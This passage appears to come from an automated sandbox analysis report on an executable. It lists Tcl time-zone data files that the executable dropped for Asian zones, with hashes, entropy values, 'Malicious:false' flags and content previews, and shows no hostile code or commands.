                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8qvwVAIgNtA2WFKwHp4WFKdv:SlSWB9IZaM3yMwVAIgE2wKi4wKt
                                                                                                                                                                                                                                                    MD5:2B286E58F2214F7A28D2A678B905CFA3
                                                                                                                                                                                                                                                    SHA1:A76B2D8BA2EA264FE84C5C1ED3A6D3E13288132F
                                                                                                                                                                                                                                                    SHA-256:6917C89A78ED54DD0C5C9968E5149D42727A9299723EC1D2EBD531A65AD37227
                                                                                                                                                                                                                                                    SHA-512:0022B48003FE9C8722FD1762FFB8E07E731661900FCE40BD6FE82B70F162FF5D32888028519D51682863ADCAC6DD21D35634CA06489FD4B704DA5A8A018BF26F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Shanghai)]} {. LoadTimeZoneFile Asia/Shanghai.}.set TZData(:Asia/Harbin) $TZData(:Asia/Shanghai).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Hebron

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7939
                                                                                                                                                                                                                                                    Entropy (8bit):3.659150861905886
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:J2aKoVy0FUeLR2S5nfclzdVYi8x6PxGtv2h4WF+MjSIRY7a4sqwQu+RvgrSUt55P:JLVy0WetivM2GIRY7a45zmr99Xb
                                                                                                                                                                                                                                                    MD5:287E4E5DC349C09D3BEF88E370F04AE9
                                                                                                                                                                                                                                                    SHA1:59F7EA7DAA2B5A19424B7EA6ADF9B7F1D12566A3
                                                                                                                                                                                                                                                    SHA-256:64D60DA57273A5B0F98D794C79644625155293B5047C1C62D0A25A71FEDC9F8E
                                                                                                                                                                                                                                                    SHA-512:9F0D818C94C15B79B288E56B402FC667F0C02291C7A509DB86EA887473A4A338CF222A210D23D9D1D5A6EDF667F539EC1530FE99ADAF83D7983FD7FF8642E8BC
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Hebron) {. {-9223372036854775808 8423 0 LMT}. {-2185410023 7200 0 EET}. {-933645600 10800 1 EET}. {-857358000 7200 0 EET}. {-844300800 10800 1 EET}. {-825822000 7200 0 EET}. {-812685600 10800 1 EET}. {-794199600 7200 0 EET}. {-779853600 10800 1 EET}. {-762656400 7200 0 EET}. {-748310400 10800 1 EET}. {-731127600 7200 0 EET}. {-682653600 7200 0 EET}. {-399088800 10800 1 EEST}. {-386650800 7200 0 EET}. {-368330400 10800 1 EEST}. {-355114800 7200 0 EET}. {-336790800 10800 1 EEST}. {-323654400 7200 0 EET}. {-305168400 10800 1 EEST}. {-292032000 7200 0 EET}. {-273632400 10800 1 EEST}. {-260496000 7200 0 EET}. {-242096400 10800 1 EEST}. {-228960000 7200 0 EET}. {-210560400 10800 1 EEST}. {-197424000 7200 0 EET}. {-178938000 10800 1 EEST}. {-165801600 7200 0 EET}. {-147402000 10800 1 EEST}. {-134265600 7200 0 EET}. {-115866000 10800 1 EE

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Ho_Chi_Minh

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):381
                                                                                                                                                                                                                                                    Entropy (8bit):4.474832924192987
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52wKKACm2OHAT1P3XTxYCuGmGt+zvmOcFVtQvuG6MUfRHUuGmQ95WuGLn:MBp52SmdHqP3tYSl+z5iVi36MUdomQ9M
                                                                                                                                                                                                                                                    MD5:466A7999B1FA3D61C17048FCF412A627
                                                                                                                                                                                                                                                    SHA1:5CFA3C9D19FAE9423F8BC9E5914DD0E7B22E658F
                                                                                                                                                                                                                                                    SHA-256:EA63CE60749382FFF09F689202F3C5B030DB1753A60BC66C540396C98E9A3433
                                                                                                                                                                                                                                                    SHA-512:65293BAFCE7E76DAAE7E9225BC09D0F80A8AA9EA000C900CF7CC66FB9BC811852C32B02E3F7510B8675939FE5BCEAE7966AF15F6542185E80E333B81114A1799
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Ho_Chi_Minh) {. {-9223372036854775808 25600 0 LMT}. {-2004073600 25590 0 PLMT}. {-1851577590 25200 0 ICT}. {-852105600 28800 0 IDT}. {-782643600 32400 0 JST}. {-767869200 25200 0 ICT}. {-718095600 28800 0 IDT}. {-457776000 25200 0 ICT}. {-315648000 28800 0 IDT}. {171820800 25200 0 ICT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Hong_Kong

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2150
                                                                                                                                                                                                                                                    Entropy (8bit):3.923186571913929
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQPeCtKkjz1lk/mJURqMJDHxyOPq8vWhV0Z8dX83FdX1BzX4JX/v9YsKP2ieGklq:5tK+Zlim0nltdT1BD45X+iA3tnN7
                                                                                                                                                                                                                                                    MD5:BBA59A5886F48DCEC5CEFDB689D36880
                                                                                                                                                                                                                                                    SHA1:8207DE6AB5F7EC6077506ED3AE2EEA3AB35C5FAE
                                                                                                                                                                                                                                                    SHA-256:F66F0F161B55571CC52167427C050327D4DB98AD58C6589FF908603CD53447F0
                                                                                                                                                                                                                                                    SHA-512:D071D97E6773FC22ABCCE3C8BE133E0FDA40C385234FEB23F69C84ABB9042E319D6891BD9CA65F2E0A048E6F374DB91E8880DCD9711A86B79A3A058517A3DBFA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Hong_Kong) {. {-9223372036854775808 27402 0 LMT}. {-2056693002 28800 0 HKT}. {-907389000 32400 1 HKST}. {-891667800 28800 0 HKT}. {-884246400 32400 0 JST}. {-766746000 28800 0 HKT}. {-747981000 32400 1 HKST}. {-728544600 28800 0 HKT}. {-717049800 32400 1 HKST}. {-694503000 28800 0 HKT}. {-683785800 32400 1 HKST}. {-668064600 28800 0 HKT}. {-654755400 32400 1 HKST}. {-636615000 28800 0 HKT}. {-623305800 32400 1 HKST}. {-605165400 28800 0 HKT}. {-591856200 32400 1 HKST}. {-573715800 28800 0 HKT}. {-559801800 32400 1 HKST}. {-542352600 28800 0 HKT}. {-528352200 32400 1 HKST}. {-510211800 28800 0 HKT}. {-498112200 32400 1 HKST}. {-478762200 28800 0 HKT}. {-466662600 32400 1 HKST}. {-446707800 28800 0 HKT}. {-435213000 32400 1 HKST}. {-415258200 28800 0 HKT}. {-403158600 32400 1 HKST}. {-383808600 28800 0 HKT}. {-371709000 32400 1 HKST}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Hovd

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6665
                                                                                                                                                                                                                                                    Entropy (8bit):3.8069447053477594
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:ufwim2VSlW/YEr32KTxCw37e2cvBtwxO+Zw+840XUNXECX5WsUPxQFuQj+SFiaPd:uOuRVBDKUJE05q9DNUdbpT5Zv
                                                                                                                                                                                                                                                    MD5:75B17F3081E1788D37E4B2EE4B941E61
                                                                                                                                                                                                                                                    SHA1:292BCE7856A8B4B94A994C50D7B7CA0CC64D7022
                                                                                                                                                                                                                                                    SHA-256:D6BCD0D416A2FB26707BCBD077FBF10D3654F2EDE74872C07579D2F21A315ACC
                                                                                                                                                                                                                                                    SHA-512:4CA29519C998E01BF7B4918AFAB7E24628CB74F08C29AE2DD7BCF4109FA1D6EC59A345FFD40AD3DEEAED3458C5D1AD9B203501892AE3B63DD0D4F65F8C88D82C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Hovd) {. {-9223372036854775808 21996 0 LMT}. {-2032927596 21600 0 HOVT}. {252439200 25200 0 HOVT}. {417978000 28800 1 HOVST}. {433785600 25200 0 HOVT}. {449600400 28800 1 HOVST}. {465321600 25200 0 HOVT}. {481050000 28800 1 HOVST}. {496771200 25200 0 HOVT}. {512499600 28800 1 HOVST}. {528220800 25200 0 HOVT}. {543949200 28800 1 HOVST}. {559670400 25200 0 HOVT}. {575398800 28800 1 HOVST}. {591120000 25200 0 HOVT}. {606848400 28800 1 HOVST}. {622569600 25200 0 HOVT}. {638298000 28800 1 HOVST}. {654624000 25200 0 HOVT}. {670352400 28800 1 HOVST}. {686073600 25200 0 HOVT}. {701802000 28800 1 HOVST}. {717523200 25200 0 HOVT}. {733251600 28800 1 HOVST}. {748972800 25200 0 HOVT}. {764701200 28800 1 HOVST}. {780422400 25200 0 HOVT}. {796150800 28800 1 HOVST}. {811872000 25200 0 HOVT}. {828205200 28800 1 HOVST}. {843926400 25200 0 HOVT}. {

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Irkutsk

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2122
                                                                                                                                                                                                                                                    Entropy (8bit):3.96053522561162
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQoewkB4/jwhTFwDHZwZ3awOvwl2zbufw5+rwg0gRww6wH8/w1Gd+RwYW61/XnET:5ykBI4CP6qaPfDkb1Mhdo1h
                                                                                                                                                                                                                                                    MD5:7A9EBA3728CD01A8B54B7A31E0937C17
                                                                                                                                                                                                                                                    SHA1:367213E8C5A0CE2FA6D80994DD5BDC3829A82CB5
                                                                                                                                                                                                                                                    SHA-256:8E540A654476D9D2B2C56FC32677FE7CBBBE9D2133FDC5024C55136F9358444A
                                                                                                                                                                                                                                                    SHA-512:5338731C5E78A795694EFB7D978E8A739FDC10E6B1BADCE46DF748F48A29A22A4F1DCB7191A2FE1FF3397FF4B8AACC046033F28BD47C563450BCF8F4D70DBBC9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Irkutsk) {. {-9223372036854775808 25025 0 LMT}. {-2840165825 25025 0 IMT}. {-1575874625 25200 0 IRKT}. {-1247554800 28800 0 IRKMMTT}. {354902400 32400 1 IRKST}. {370710000 28800 0 IRKT}. {386438400 32400 1 IRKST}. {402246000 28800 0 IRKT}. {417974400 32400 1 IRKST}. {433782000 28800 0 IRKT}. {449596800 32400 1 IRKST}. {465328800 28800 0 IRKT}. {481053600 32400 1 IRKST}. {496778400 28800 0 IRKT}. {512503200 32400 1 IRKST}. {528228000 28800 0 IRKT}. {543952800 32400 1 IRKST}. {559677600 28800 0 IRKT}. {575402400 32400 1 IRKST}. {591127200 28800 0 IRKT}. {606852000 32400 1 IRKST}. {622576800 28800 0 IRKT}. {638301600 32400 1 IRKST}. {654631200 28800 0 IRKT}. {670356000 25200 0 IRKMMTT}. {670359600 28800 1 IRKST}. {686084400 25200 0 IRKT}. {695761200 28800 0 IRKMMTT}. {701794800 32400 1 IRKST}. {717516000 28800 0 IRKT}. {733255200 32400

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Istanbul

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):182
                                                                                                                                                                                                                                                    Entropy (8bit):4.853387718159342
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxV0XaDvFVAIgoq3XPHt2WFK4HB/8QaqXNn:SlSWB9IZaM3ymQazFVAIgoQPHt2wK4HJ
                                                                                                                                                                                                                                                    MD5:7EC8D7D32DC13BE15122D8E26C55F9A2
                                                                                                                                                                                                                                                    SHA1:5B07C7161F236DF34B0FA83007ECD75B6435F420
                                                                                                                                                                                                                                                    SHA-256:434B8D0E3034656B3E1561615CCA192EFA62942F285CD59338313710900DB6CB
                                                                                                                                                                                                                                                    SHA-512:D8F1999AF509871C0A7184CFEFB0A50C174ABDE218330D9CDC784C7599A655AD55F6F2173096EA91EE5700B978B9A94BBFCA41970206E7ADEB804D0EE03B45ED
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Istanbul)]} {. LoadTimeZoneFile Europe/Istanbul.}.set TZData(:Asia/Istanbul) $TZData(:Europe/Istanbul).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Jakarta

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):350
                                                                                                                                                                                                                                                    Entropy (8bit):4.542050715764197
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52wKcr6m2OHATJesaSYzfkc5q/wGiNWSyvmJdwGiD1HiDF4mwGiLTFSwS:MBp52E6mdHjk+8c5awGi0SyIwGiDhiD1
                                                                                                                                                                                                                                                    MD5:02C6F624D7D195D38B0B7F87DEC6E73E
                                                                                                                                                                                                                                                    SHA1:DD3D6ABABF5808DB130017D6FAD5910AAE309108
                                                                                                                                                                                                                                                    SHA-256:234422AD44B7529CBF6A8CB02B11F9CF4639EAA382104D73E6367E8F24552A7B
                                                                                                                                                                                                                                                    SHA-512:FEFC297015AEEA5A909975EC0633DC2FFB119E436B01C9565B8402D65A0CE9BAF063156D23A605A3517253706A656D63B4E370461C8EC4BBA60A3F573F783E37
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Jakarta) {. {-9223372036854775808 25632 0 LMT}. {-3231299232 25632 0 BMT}. {-1451719200 26400 0 JAVT}. {-1172906400 27000 0 WIB}. {-876641400 32400 0 JST}. {-766054800 27000 0 WIB}. {-683883000 28800 0 WIB}. {-620812800 27000 0 WIB}. {-189415800 25200 0 WIB}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Jayapura

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):204
                                                                                                                                                                                                                                                    Entropy (8bit):4.843450549897039
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52wKcjm2OHG4YVkcfvhyowOGCV4zvhL:MBp52omdHNYacfoo1VkV
                                                                                                                                                                                                                                                    MD5:8A51DF89DD90ED0E198E8934B98DFD25
                                                                                                                                                                                                                                                    SHA1:0CE93E2B06717056F2ED0660F71A98B4A74272B0
                                                                                                                                                                                                                                                    SHA-256:8A90F4DB1EA1B3F07610CF4256A1214FC351652B8ECC4D2412257F6DF8A7540C
                                                                                                                                                                                                                                                    SHA-512:81F94DB65EFD39BF074184ACE2BCFA2932175BF6F48FF48425736E772F87FD73BD4278FD3C5BFABA1C6E6359426E9344BAB5C055967B58DD645C537E6AF4306D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Jayapura) {. {-9223372036854775808 33768 0 LMT}. {-1172913768 32400 0 WIT}. {-799491600 34200 0 ACST}. {-189423000 32400 0 WIT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Jerusalem

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7690
                                                                                                                                                                                                                                                    Entropy (8bit):3.684387169764595
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:GzmnxfFtWR8fKnG/QvW+tCE5nfclzdVYi8x6PxGtv2TiGuyLsbAicBnKqXRGlGrz:0mKivDivbOKWKwX5BrAZp0
                                                                                                                                                                                                                                                    MD5:4C37DF27AB1E906CC624A62288847BA8
                                                                                                                                                                                                                                                    SHA1:BE690D3958A4A6722ABDF047BF22ACEC8B6D6AFE
                                                                                                                                                                                                                                                    SHA-256:F10DF7378FF71EDA45E8B1C007A280BBD4629972D12EAB0C6BA7623E98AAFA17
                                                                                                                                                                                                                                                    SHA-512:B14F5FB330078A564796114FA6804EA12CE0AD6B2DF6D871FF6E7B416425B12FFD6B4E8511FCD55609FBCE95C8EDFF1E14B1C8C505F4B5B66F47EA52FD53F307
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Jerusalem) {. {-9223372036854775808 8454 0 LMT}. {-2840149254 8440 0 JMT}. {-1641003640 7200 0 IST}. {-933645600 10800 1 IDT}. {-857358000 7200 0 IST}. {-844300800 10800 1 IDT}. {-825822000 7200 0 IST}. {-812685600 10800 1 IDT}. {-794199600 7200 0 IST}. {-779853600 10800 1 IDT}. {-762656400 7200 0 IST}. {-748310400 10800 1 IDT}. {-731127600 7200 0 IST}. {-681962400 14400 1 IDDT}. {-673243200 10800 1 IDT}. {-667962000 7200 0 IST}. {-652327200 10800 1 IDT}. {-636426000 7200 0 IST}. {-622087200 10800 1 IDT}. {-608947200 7200 0 IST}. {-591847200 10800 1 IDT}. {-572486400 7200 0 IST}. {-558576000 10800 1 IDT}. {-542851200 7200 0 IST}. {-527731200 10800 1 IDT}. {-514425600 7200 0 IST}. {-490845600 10800 1 IDT}. {-482986800 7200 0 IST}. {-459475200 10800 1 IDT}. {-451537200 7200 0 IST}. {-428551200 10800 1 IDT}. {-418262400 7200 0 IST}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Kabul

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):171
                                                                                                                                                                                                                                                    Entropy (8bit):4.853601274352773
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx52WFKTwkXGm2OHodFxsYvXgVHURRNV3Fqdj/cXHFk5:SlSWB9X52wKTEm2OHoH+YPgVHURbRFIR
                                                                                                                                                                                                                                                    MD5:43B74064BEEB2CE6D805234CB47A1EAB
                                                                                                                                                                                                                                                    SHA1:CE3C389E33948A9C45EFE1CD68D01E7D971014C1
                                                                                                                                                                                                                                                    SHA-256:58A8B20C1CB4C0C2F329A0E7869E1F11223E1AC35AC2C275930543A79689170B
                                                                                                                                                                                                                                                    SHA-512:0618804849BC540480DD6E165CBBCAF7675B74580961D02DAF6A158AD10D47EEA57757115F64A67060C8F3D96917FD21F71733DB16D9C3A5E2F4EB6DD99DC4FA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kabul) {. {-9223372036854775808 16608 0 LMT}. {-2524538208 14400 0 AFT}. {-788932800 16200 0 AFT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Kamchatka

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2097
                                                                                                                                                                                                                                                    Entropy (8bit):3.9243582157859627
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQ+3e8/95MLQe7+F9b2M7Mx8c8JF5i3L5rSv9Bx12S8+igR7todVMwLF68SRWMnW:5c/ryKF9lcFIvDH2BdIf59e32Ct
                                                                                                                                                                                                                                                    MD5:00EB1A20193C078423934CFD3B84B1CE
                                                                                                                                                                                                                                                    SHA1:1C53A7872A3C9E0398F44DF1F441D81B907B6329
                                                                                                                                                                                                                                                    SHA-256:58E26F3AE41EA89F186F109BC1110121C898995A5DD350EDDE69FB805758C253
                                                                                                                                                                                                                                                    SHA-512:0C70BB8D0BC6A3D1A335CF2EB6F065A1FEBAC2C42FD9F87C29CD84015759F13868C01AF364B5D627FC5B0D749D048CDA51D518FC4A34D82FF45A7B20EB1E7928
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kamchatka) {. {-9223372036854775808 38076 0 LMT}. {-1487759676 39600 0 PETT}. {-1247569200 43200 0 PETMMTT}. {354888000 46800 1 PETST}. {370695600 43200 0 PETT}. {386424000 46800 1 PETST}. {402231600 43200 0 PETT}. {417960000 46800 1 PETST}. {433767600 43200 0 PETT}. {449582400 46800 1 PETST}. {465314400 43200 0 PETT}. {481039200 46800 1 PETST}. {496764000 43200 0 PETT}. {512488800 46800 1 PETST}. {528213600 43200 0 PETT}. {543938400 46800 1 PETST}. {559663200 43200 0 PETT}. {575388000 46800 1 PETST}. {591112800 43200 0 PETT}. {606837600 46800 1 PETST}. {622562400 43200 0 PETT}. {638287200 46800 1 PETST}. {654616800 43200 0 PETT}. {670341600 39600 0 PETMMTT}. {670345200 43200 1 PETST}. {686070000 39600 0 PETT}. {695746800 43200 0 PETMMTT}. {701780400 46800 1 PETST}. {717501600 43200 0 PETT}. {733240800 46800 1 PETST}. {748965600 4320

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Karachi

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):436
                                                                                                                                                                                                                                                    Entropy (8bit):4.388322988460791
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp52SmdH35S6DvJGnQmYd4vJGNEH+emSvtk6a2iW6oNl:cQSe3pJGnQ1oJGNErmKTh
                                                                                                                                                                                                                                                    MD5:3187FD74C102BA1F43F583EC21C793FE
                                                                                                                                                                                                                                                    SHA1:919FBFE5CA517A691F71FEDFA6708C711C57FB56
                                                                                                                                                                                                                                                    SHA-256:69772D2E11F94B0BF327577C7D323115AF876280B1ACE880885F7A7B8294A98D
                                                                                                                                                                                                                                                    SHA-512:31A68FAE751973F8EC4A5AC635EDB4E6A61FA20EC43EC3E555B93ACCA2BE4138ACAD7B75A2ECEE9FFE57E88561CDC0B19A9B8ACA6477461BCB4A5391B8E46CB2
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Karachi) {. {-9223372036854775808 16092 0 LMT}. {-1988166492 19800 0 IST}. {-862637400 23400 1 IST}. {-764145000 19800 0 IST}. {-576135000 18000 0 KART}. {38775600 18000 0 PKT}. {1018119660 21600 1 PKST}. {1033840860 18000 0 PKT}. {1212260400 21600 1 PKST}. {1225476000 18000 0 PKT}. {1239735600 21600 1 PKST}. {1257012000 18000 0 PKT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Kashgar

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):169
                                                                                                                                                                                                                                                    Entropy (8bit):4.920527043039276
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8s4YkdVAIgNrMvN2WFKu3e2WFKjvn:SlSWB9IZaM3yMGdVAIgWvN2wKulwKjvn
                                                                                                                                                                                                                                                    MD5:9A66108527388564A9FBDB87D586105F
                                                                                                                                                                                                                                                    SHA1:945E043A3CC45A4654C2D745A48E1D15F80A3CB5
                                                                                                                                                                                                                                                    SHA-256:E2965AF4328FB065A82E8A21FF342C29A5942C2EDD304CE1C9087A23A91B65E1
                                                                                                                                                                                                                                                    SHA-512:C3985D972AFB27E194CBE117E6CF8C45AA5A1B6504133FF85D52E8024387133D11F9EE7238FF87DC1D96F140B9467E6DB3F99B0B98299E6782A643288ABD3308
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Urumqi)]} {. LoadTimeZoneFile Asia/Urumqi.}.set TZData(:Asia/Kashgar) $TZData(:Asia/Urumqi).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Kathmandu

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):174
                                                                                                                                                                                                                                                    Entropy (8bit):4.922860853700539
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx52WFKXIi7mFSXGm2OHF+VT5vUQKwMTXvvhGFFRk8P4Vvz7YvC:SlSWB9X52wKYgyJm2OH0T5RNMzvJGzR8
                                                                                                                                                                                                                                                    MD5:22F2D8D0784F512229C97AB2BAA8A74D
                                                                                                                                                                                                                                                    SHA1:094F1A9ED44D2C59AC23FC68BBD79F4A9106CD73
                                                                                                                                                                                                                                                    SHA-256:1FE25575950AFD271395661926068B917FA32360B46B94F8DBF148BFB597D24D
                                                                                                                                                                                                                                                    SHA-512:8AF5BACF0ACD0EA8F25F8FC227BCD2CF18735306F41E11763947B2DFF84229511F712E9E6F893D3CEEB36993503D68969D4B0D0FBFA91F469BDDDC23CF9CBA84
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kathmandu) {. {-9223372036854775808 20476 0 LMT}. {-1577943676 19800 0 IST}. {504901800 20700 0 NPT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Katmandu

